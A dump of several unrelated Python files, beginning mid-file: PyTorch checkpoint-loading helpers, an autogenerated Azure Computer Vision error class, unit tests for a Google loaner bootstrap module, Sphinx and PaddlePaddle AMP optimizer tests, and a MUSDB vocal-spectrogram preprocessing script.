''' Old style model is stored with all names of parameters share common prefix 'module.' '''
logger.info('remove prefix \'{}\''.format(prefix))
f = lambda x: x.split(prefix, 1)[-1] if x.startswith(prefix) else x
return {f(key): value for key, value in state_dict.items()}
def load_pretrain(model, pretrained_path):
logger.info('load pretrained model from {}'.format(pretrained_path))
if not torch.cuda.is_available():
pretrained_dict = torch.load(pretrained_path, map_location=lambda storage, loc: storage)
else:
device = torch.cuda.current_device()
pretrained_dict = torch.load(pretrained_path, map_location=lambda storage, loc: storage.cuda(device))
if "state_dict" in pretrained_dict.keys():
pretrained_dict = remove_prefix(pretrained_dict['state_dict'], 'module.')
else:
pretrained_dict = remove_prefix(pretrained_dict, 'module.')
try:
check_keys(model, pretrained_dict)
except:
logger.info('[Warning]: using pretrain as features. Adding "features." as prefix')
new_dict = {}
for k, v in pretrained_dict.items():
k = 'features.' + k
new_dict[k] = v
pretrained_dict = new_dict
check_keys(model, pretrained_dict)
model.load_state_dict(pretrained_dict, strict=False)
return model
def restore_from(model, optimizer, ckpt_path):
logger.info('restore from {}'.format(ckpt_path))
device = torch.cuda.current_device()
ckpt = torch.load(ckpt_path, map_location=lambda storage, loc: storage.cuda(device))
epoch = ckpt['epoch']
best_acc = ckpt['best_acc']
arch = ckpt['arch']
ckpt_model_dict = remove_prefix(ckpt['state_dict'], 'module.')
check_keys(model, ckpt_model_dict)
model.load_state_dict(ckpt_model_dict, strict=False)
check_keys(optimizer, ckpt['optimizer'])
# ckpt['optimizer']['param_groups'] = [ckpt['optimizer']['param_groups'][0],
# ckpt['optimizer']['param_groups'][2],
# ckpt['optimizer']['param_groups'][3]]
optimizer.load_state_dict(ckpt['optimizer'])
return model, optimizer, epoch, best_acc, arch
|
py | b4112ddba880d3dca99540318ce3f434f6ed6bcd | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
from msrest.exceptions import HttpOperationError
class ComputerVisionError(Model):
"""ComputerVisionError.
All required parameters must be populated in order to send to Azure.
:param code: Required. The error code. Possible values include:
'InvalidImageUrl', 'InvalidImageFormat', 'InvalidImageSize',
'NotSupportedVisualFeature', 'NotSupportedImage', 'InvalidDetails',
'NotSupportedLanguage', 'BadArgument', 'FailedToProcess', 'Timeout',
'InternalServerError', 'Unspecified', 'StorageException'
:type code: str or
~azure.cognitiveservices.vision.computervision.models.ComputerVisionErrorCodes
:param message: Required. A message explaining the error reported by the
service.
:type message: str
:param request_id: A unique request identifier.
:type request_id: str
"""
_validation = {
'code': {'required': True},
'message': {'required': True},
}
_attribute_map = {
'code': {'key': 'code', 'type': 'ComputerVisionErrorCodes'},
'message': {'key': 'message', 'type': 'str'},
'request_id': {'key': 'requestId', 'type': 'str'},
}
def __init__(self, *, code, message: str, request_id: str=None, **kwargs) -> None:
super(ComputerVisionError, self).__init__(**kwargs)
self.code = code
self.message = message
self.request_id = request_id
class ComputerVisionErrorException(HttpOperationError):
"""Server responsed with exception of type: 'ComputerVisionError'.
:param deserialize: A deserializer
:param response: Server response to be deserialized.
"""
def __init__(self, deserialize, response, *args):
super(ComputerVisionErrorException, self).__init__(deserialize, response, 'ComputerVisionError', *args)
|
py | b4112e41d2e8093f709fda9fb461f9df035d9254 | # Copyright 2018 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for backend.lib.bootstrap."""
import datetime
import os
import mock
from google.appengine.ext import deferred # pylint: disable=unused-import
from loaner.web_app.backend.clients import bigquery_client # pylint: disable=unused-import
from loaner.web_app.backend.lib import bootstrap
from loaner.web_app.backend.lib import datastore_yaml # pylint: disable=unused-import
from loaner.web_app.backend.models import bootstrap_status_model
from loaner.web_app.backend.models import config_model
from loaner.web_app.backend.testing import loanertest
class BootstrapTest(loanertest.TestCase):
"""Tests for the datastore YAML importer lib."""
@mock.patch('__main__.bootstrap.constants.BOOTSTRAP_ENABLED', True)
@mock.patch('google.appengine.ext.deferred.defer')
def test_run_bootstrap(self, mock_defer):
"""Tests that run_bootstrap defers tasks for all four methods."""
mock_defer.return_value = 'fake-task'
self.assertFalse(config_model.Config.get(
'bootstrap_started'))
bootstrap.run_bootstrap({
'bootstrap_bq_history': {},
'bootstrap_chrome_ous': {},
'bootstrap_datastore_yaml': {
'yaml_input': 'fake-yaml'
}
})
self.assertEqual(len(mock_defer.mock_calls), 3)
self.assertTrue(config_model.Config.get(
'bootstrap_started'))
@mock.patch('__main__.bootstrap.constants.BOOTSTRAP_ENABLED', True)
@mock.patch('google.appengine.ext.deferred.defer')
def test_run_bootstrap_all_functions(self, mock_defer):
"""Tests that run_bootstrap defers tasks for all four methods."""
mock_defer.return_value = 'fake-task'
self.assertFalse(config_model.Config.get(
'bootstrap_started'))
bootstrap.run_bootstrap()
self.assertEqual(len(mock_defer.mock_calls), 3)
self.assertTrue(config_model.Config.get(
'bootstrap_started'))
@mock.patch('__main__.bootstrap.constants.BOOTSTRAP_ENABLED', False)
def test_run_bootstrap_while_disabled(self):
"""Tests that bootstrapping is disallowed when constant False."""
self.assertRaises(
bootstrap.BootstrapError, bootstrap.run_bootstrap,
{'bootstrap_fake_method': {}})
@mock.patch('__main__.bootstrap.constants.BOOTSTRAP_ENABLED', True)
@mock.patch('__main__.bootstrap.datastore_yaml.import_yaml')
def test_manage_task_being_called(self, mock_importyaml):
"""Tests that the manage_task decorator is doing its task management."""
del mock_importyaml # Unused.
bootstrap.bootstrap_datastore_yaml(user_email='foo')
expected_model = bootstrap_status_model.BootstrapStatus.get_by_id(
'bootstrap_datastore_yaml')
self.assertTrue(bootstrap.bootstrap_datastore_yaml.__doc__.startswith(
expected_model.description))
self.assertTrue(expected_model.success)
self.assertTrue(expected_model.timestamp < datetime.datetime.utcnow())
@mock.patch('__main__.bootstrap.constants.BOOTSTRAP_ENABLED', True)
@mock.patch('__main__.bootstrap.datastore_yaml.import_yaml')
def test_manage_task_handles_exception(self, mock_importyaml):
"""Tests that the manage_task decorator kandles an exception."""
mock_importyaml.side_effect = KeyError('task-exception')
self.assertRaisesRegexp(
deferred.PermanentTaskFailure,
'bootstrap_datastore_yaml.*task-exception',
bootstrap.bootstrap_datastore_yaml, user_email='foo')
expected_model = bootstrap_status_model.BootstrapStatus.get_by_id(
'bootstrap_datastore_yaml')
self.assertFalse(expected_model.success)
self.assertTrue(expected_model.timestamp < datetime.datetime.utcnow())
@mock.patch('__main__.bootstrap.constants.BOOTSTRAP_ENABLED', True)
@mock.patch('__main__.bootstrap.datastore_yaml.import_yaml')
def test_bootstrap_datastore_yaml(self, mock_importyaml):
"""Tests bootstrap_datastore_yaml."""
bootstrap.bootstrap_datastore_yaml(user_email='foo')
yaml_file_to_string = open(os.path.join(
os.path.dirname(__file__), 'bootstrap.yaml')).read()
mock_importyaml.assert_called_once_with(
yaml_file_to_string, 'foo', True)
@mock.patch('__main__.bootstrap.logging.info')
@mock.patch('__main__.bootstrap.logging.warn')
@mock.patch('__main__.bootstrap.constants.BOOTSTRAP_ENABLED', True)
@mock.patch('__main__.bootstrap.directory.DirectoryApiClient')
def test_bootstrap_chrome_ous(
self, mock_directoryclass, mock_logwarn, mock_loginfo):
mock_client = mock_directoryclass.return_value
mock_client.get_org_unit.return_value = None
bootstrap.bootstrap_chrome_ous(user_email='foo')
self.assertEqual(3, mock_loginfo.call_count)
# Everything is fine.
mock_client.insert_org_unit.assert_has_calls([
mock.call(path) for _, path in
bootstrap.constants.ORG_UNIT_DICT.iteritems()
])
# get_org_unit reveals an existing OU of that name.
mock_client.reset_mock()
mock_client.get_org_unit.return_value = {'fake': 'response'}
bootstrap.bootstrap_chrome_ous(user_email='foo')
mock_client.insert_org_unit.assert_not_called()
mock_logwarn.assert_has_calls([
mock.call(bootstrap._ORG_UNIT_EXISTS_MSG, org_unit_name) for
org_unit_name in bootstrap.constants.ORG_UNIT_DICT
])
@mock.patch('__main__.bigquery_client.BigQueryClient')
def test_bootstrap_bq_history(self, mock_clientclass):
"""Tests bootstrap_bq_history."""
mock_client = mock.Mock()
mock_clientclass.return_value = mock_client
bootstrap.bootstrap_bq_history()
mock_client.initialize_tables.assert_called()
def test_is_bootstrap_completed(self):
"""Tests is_bootstrap_completed under myriad circumstances."""
self.assertFalse(bootstrap.is_bootstrap_completed())
bootstrap.config_model.Config.set('bootstrap_started', True)
self.assertFalse(bootstrap.is_bootstrap_completed())
bootstrap.config_model.Config.set('bootstrap_completed', False)
self.assertFalse(bootstrap.is_bootstrap_completed())
bootstrap.config_model.Config.set('bootstrap_completed', True)
self.assertTrue(bootstrap.is_bootstrap_completed())
def test_is_bootstrap_started(self):
self.assertFalse(bootstrap.is_bootstrap_started())
bootstrap.config_model.Config.set('bootstrap_started', True)
self.assertTrue(bootstrap.is_bootstrap_started())
@mock.patch('__main__.bootstrap.constants.BOOTSTRAP_ENABLED', True)
@mock.patch('__main__.bootstrap.get_all_bootstrap_functions')
def test_get_bootstrap_task_status(self, mock_getall):
"""Tests get_bootstrap_task_status."""
yesterday = datetime.datetime.utcnow() - datetime.timedelta(days=-1)
def fake_function1():
pass
def fake_function2():
pass
mock_getall.return_value = {
'fake_function1': fake_function1,
'fake_function2': fake_function2
}
fake_entity1 = bootstrap_status_model.BootstrapStatus.get_or_insert(
'fake_function1')
fake_entity1.success = True
fake_entity1.timestamp = yesterday
fake_entity1.details = ''
fake_entity1.put()
fake_entity2 = bootstrap_status_model.BootstrapStatus.get_or_insert(
'fake_function2')
fake_entity2.success = False
fake_entity2.timestamp = yesterday
fake_entity2.details = 'Exception raise we failed oh no.'
fake_entity2.put()
status = bootstrap.get_bootstrap_task_status()
self.assertEqual(len(status), 2)
if __name__ == '__main__':
loanertest.main()
|
py | b4112e6d0a0c5067c6ac9467b040f72b5c7a6fc4 | """
Test the optional sidebars in the basic theme as well as the modindex
and other generated pages.
"""
import pytest
from bs4.element import Tag
pytestmark = pytest.mark.sphinx('html', testroot='indices')
@pytest.mark.parametrize('page', ['genindex.html', ], indirect=True)
class TestBasicGenindex:
""" Turn on the optional html_sidebars in the basic theme """
def test_heading(self, page):
heading: Tag = page.select_one('h1#index')
assert heading
# The href on the link
assert 'Index' == heading.text
|
py | b4112e88860cd21ebd96400079c51e1676af8f63 | # Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
import paddle
import paddle.fluid as fluid
import paddle.distributed.fleet as fleet
from paddle.distributed.fleet.meta_optimizers import AMPOptimizer
import os
from fleet_meta_optimizer_base import TestFleetMetaOptimizer
paddle.enable_static()
class TestFleetAMPOptimizer(TestFleetMetaOptimizer):
def test_amp_optimizer_backward(self):
""" test amp optimizer backward """
train_prog, startup_prog = fluid.Program(), fluid.Program()
avg_cost, strategy = self.net(train_prog, startup_prog)
opt = fluid.optimizer.MomentumOptimizer(
learning_rate=0.001, momentum=0.9)
opt = AMPOptimizer(opt)
opt.user_defined_strategy = strategy
params_grads = opt.backward(avg_cost, startup_prog)
ops = [op.type for op in avg_cost.block.ops]
self.assertIn('cast', ops)
self.assertNotIn('check_finite_and_unscale', ops)
def test_amp_optimizer_backward_gradients(self):
""" test amp optimizer backward + gradients"""
train_prog, startup_prog = fluid.Program(), fluid.Program()
avg_cost, strategy = self.net(train_prog, startup_prog)
opt = fluid.optimizer.MomentumOptimizer(
learning_rate=0.001, momentum=0.9)
opt = AMPOptimizer(opt)
opt.user_defined_strategy = strategy
params_grads = opt.backward(avg_cost, startup_prog)
with fluid.program_guard(train_prog, startup_prog):
opt.apply_gradients(params_grads)
ops = [op.type for op in avg_cost.block.ops]
self.assertIn('cast', ops)
self.assertIn('check_finite_and_unscale', ops)
def test_amp_optimizer_backward_optimize(self):
""" test amp optimizer backward + optimizer """
train_prog, startup_prog = fluid.Program(), fluid.Program()
avg_cost, strategy = self.net(train_prog, startup_prog)
opt = fluid.optimizer.MomentumOptimizer(
learning_rate=0.001, momentum=0.9)
opt = AMPOptimizer(opt)
opt.user_defined_strategy = strategy
params_grads = opt.backward(avg_cost, startup_prog)
opt.apply_optimize(avg_cost, startup_prog, params_grads)
ops = [op.type for op in avg_cost.block.ops]
self.assertIn('cast', ops)
self.assertIn('check_finite_and_unscale', ops)
def test_amp_optimizer(self):
""" test amp """
train_prog, startup_prog = fluid.Program(), fluid.Program()
avg_cost, strategy = self.net(train_prog, startup_prog)
self.set_strategy(strategy, 'amp')
self.optimizer(avg_cost, strategy, train_prog, startup_prog)
ops = [op.type for op in avg_cost.block.ops]
self.assertIn('cast', ops)
self.assertIn('check_finite_and_unscale', ops)
def test_amp_recompute_optimizer(self):
""" test amp + recompute """
train_prog, startup_prog = fluid.Program(), fluid.Program()
avg_cost, strategy = self.net(train_prog, startup_prog)
self.set_strategy(strategy, 'amp')
self.set_strategy(strategy, 'recompute')
self.optimizer(avg_cost, strategy, train_prog, startup_prog)
strategy = fleet._final_strategy()
ops = [op.type for op in avg_cost.block.ops]
outs = [
op.output('Out')[0] for op in avg_cost.block.ops if op.type == 'mul'
]
self.assertIn('cast', ops)
self.assertIn('check_finite_and_unscale', ops)
# recompute
self.assertIn('subprog', ''.join(outs))
def test_amp_recompute_lars_optimizer(self):
""" test amp + recompute """
train_prog, startup_prog = fluid.Program(), fluid.Program()
avg_cost, strategy = self.net(train_prog, startup_prog)
self.set_strategy(strategy, 'amp')
self.set_strategy(strategy, 'recompute')
self.set_strategy(strategy, 'lars')
self.optimizer(avg_cost, strategy, train_prog, startup_prog)
strategy = fleet._final_strategy()
ops = [op.type for op in avg_cost.block.ops]
outs = [
op.output('Out')[0] for op in avg_cost.block.ops if op.type == 'mul'
]
self.assertIn('cast', ops)
self.assertIn('check_finite_and_unscale', ops)
# recompute
self.assertIn('subprog', ''.join(outs))
# lars
self.assertIn('lars_momentum', ops)
def test_amp_recompute_lamb_optimizer(self):
train_prog, startup_prog = fluid.Program(), fluid.Program()
avg_cost, strategy = self.net(train_prog, startup_prog)
self.set_strategy(strategy, 'amp')
self.set_strategy(strategy, 'recompute')
self.set_strategy(strategy, 'lamb')
self.optimizer(avg_cost, strategy, train_prog, startup_prog, 'adam')
ops = [op.type for op in avg_cost.block.ops]
outs = [
op.output('Out')[0] for op in avg_cost.block.ops if op.type == 'mul'
]
self.assertIn('cast', ops)
self.assertIn('check_finite_and_unscale', ops)
# recompute
self.assertIn('subprog', ''.join(outs))
# lamb
self.assertIn('lamb', ops)
if __name__ == "__main__":
unittest.main()
|
py | b4112f37902079157e7075d56dc82d3c754c5b1e | import librosa
from librosa.util import find_files
from librosa import load
import os
import numpy as np
from config import *
from tqdm import tqdm
from scipy.signal import butter, filtfilt
db_train = "./musdb/train"
def butter_lowpass(cutoff, fs, order=5):
nyq = 0.5 * fs
normal_cutoff = cutoff / nyq
b, a = butter(order, normal_cutoff, btype='low', analog=False)
return b, a
def butter_lowpass_filter(data, cutoff, fs, order=5):
b, a = butter_lowpass(cutoff, fs, order=order)
y = filtfilt(b, a, data)
return y
def process():
parent = os.path.dirname(os.path.dirname(db_train))
db = os.listdir(db_train)
for song_dir in tqdm(db):
song_path = db_train + '/' + song_dir
tracks = find_files(song_path,ext="wav")
# tracks[0] --> accompaniment (instrumental)
# tracks[4] --> mixture
# tracks[6] --> vocals
#inst,_ = load(tracks[0], sr=None)
mix,_ = load(tracks[4], sr=None)
vocal,_ = load(tracks[6], sr=None)
#44100 is sample rate of musdb18 dataset
mix = librosa.core.resample(mix,44100,SR)
vocal = librosa.core.resample(vocal,44100,SR)
#inst = librosa.core.resample(inst,44100,SR)
S_mix = butter_lowpass_filter(mix, window_size, SR, order=5)
S_vocal = butter_lowpass_filter(vocal, window_size, SR, order=5)
S_mix = librosa.stft(S_mix,n_fft=window_size,hop_length=hop_length).astype(np.float32)
#S_inst = np.abs(librosa.stft(inst,n_fft=window_size,hop_length=hop_length)).astype(np.float32)
S_vocal = librosa.stft(S_vocal,n_fft=window_size,hop_length=hop_length).astype(np.float32)
Y_mix = np.abs(S_mix) ** 2
#Y_inst
Y_vocal = np.abs(S_vocal) ** 2
Y_log_mix = librosa.power_to_db(Y_mix)
Y_log_vocal = librosa.power_to_db(Y_vocal)
norm1 = Y_log_mix.max()
norm2 = Y_log_vocal.max()
Y_log_mix /= norm1
#S_inst /= norm
Y_log_vocal /= norm2
spec_dir = parent + '/spectrogram/' + song_dir
np.savez(spec_dir,mix=S_mix, vocal=S_vocal)
if __name__ == '__main__':
process()
|
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.